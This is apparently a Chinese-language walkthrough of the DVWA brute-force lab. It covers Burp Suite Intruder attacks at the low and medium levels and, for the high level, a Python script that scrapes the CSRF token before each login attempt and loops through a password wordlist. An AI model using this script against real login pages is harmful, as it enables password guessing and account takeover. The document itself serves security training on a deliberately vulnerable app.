1.Low 级别
burpsuite抓包
low级别是使用GET请求进行登录,将其发送到Intruder中,并增加password变量
之后选择字典开始攻击。
暴力破解完成后,查看结果RESULT,根据Content-Length来判断登陆是否成功。
2.MEDIUM级别
有效抵制了sql注入,但是并未有对爆破破解做有抵御措施,因此爆破方法与上述类似,只是这里增加了一个sleep(2)会降低爆破的时间。
3.HIGH级别
此时在登录时就加入了令牌机制,该令牌被放置在提交的表格中,每次提交登录都会先对token进行校验。因此每次都需要先把token爬取到只有在进行登录提交,从而实现暴力破解。
这里就通过爬虫的方式进行暴力破解,首先抓去Token,之后带Token提交参数,得到的response判断其长度,也是根据长度进行判断是否登陆成功。
参考freebuf上的文章,代码如下:
#coding=utf-8 from bs4 import BeautifulSoup import requests header={ 'Host':'vspiders.iok.la', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Referer': 'http://vspiders.iok.la/dvwa/vulnerabilities/brute/index.php', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Cookie': 'security=high; PHPSESSID=nqnhr54k42sd46r0t0uq6u32v4', 'Connection':'close' } requrl="http://vspiders.iok.la/dvwa/vulnerabilities/brute/index.php" dvwa_session = requests.Session() i=0 def get_token(requrl,header): req=dvwa_session.get(url=requrl,headers=header,) the_page=req.content response=req.status_code soup=BeautifulSoup(the_page,"lxml") user_token=soup.form.find_all('input')[3]['value'] return user_token,len(the_page) user_token,l=get_token(requrl,header) for line in open('rkolin.txt'): requrl="http://vspiders.iok.la/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token i=i+1 user_token,l=get_token(requrl,header) print i,'admin',line.strip(),l